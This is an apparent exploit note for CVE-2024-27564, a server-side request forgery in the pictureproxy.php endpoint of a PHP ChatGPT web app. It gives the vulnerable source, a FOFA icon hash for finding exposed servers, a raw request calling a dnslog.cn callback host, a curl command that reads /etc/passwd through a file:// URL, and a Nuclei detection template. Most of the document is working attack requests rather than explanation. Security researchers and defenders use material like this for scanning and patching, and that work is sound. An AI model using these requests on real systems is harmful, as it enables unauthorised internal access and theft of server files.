CVE-2024-27564

<?phpif (isset($_GET['url'])) {    $image = file_get_contents($_GET['url']);    header("Content-type: image/jpeg");    echo $image;} else {    echo "Invalid request";}

icon_hash="-1999760920"

GET /pictureproxy.php?url=http://hbwqkb.dnslog.cn HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeUpgrade-Insecure-Requests: 1

curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/passwd

id: CVE-2024-27564info:  name: chatgpt pictureproxy.php SSRF漏洞  author: fgz  severity: high  description: |    chatgpt是全网最易部署，响应速度最快的ChatGPT环境。PHP版调用OpenAI接口进行问答和画图，采用Stream流模式通信，一边生成一边输出。前端采用EventSource，支持Markdown格式解析，支持公式显示，代码有着色处理，支持画图。页面UI简洁，支持上下文连续会话。chatgpt 的 pictureproxy.php 接口处没有对url参数进行校验，攻击者可以通过url参数注入任意URL让应用发出任意请求。  reference:    - https://avd.aliyun.com/detail?id=AVD-2024-27564  metadata:    max-request: 1    fofa-query: icon_hash="-1999760920"    verified: true  tags: CVE-2024,ssrf,chatgptrequests:  - raw:      - |        GET /pictureproxy.php?url=http://{{interactsh-url}} HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate, br        Connection: close        Upgrade-Insecure-Requests: 1    matchers:      - type: dsl        dsl:          - contains(interactsh_protocol, "dns")        condition: and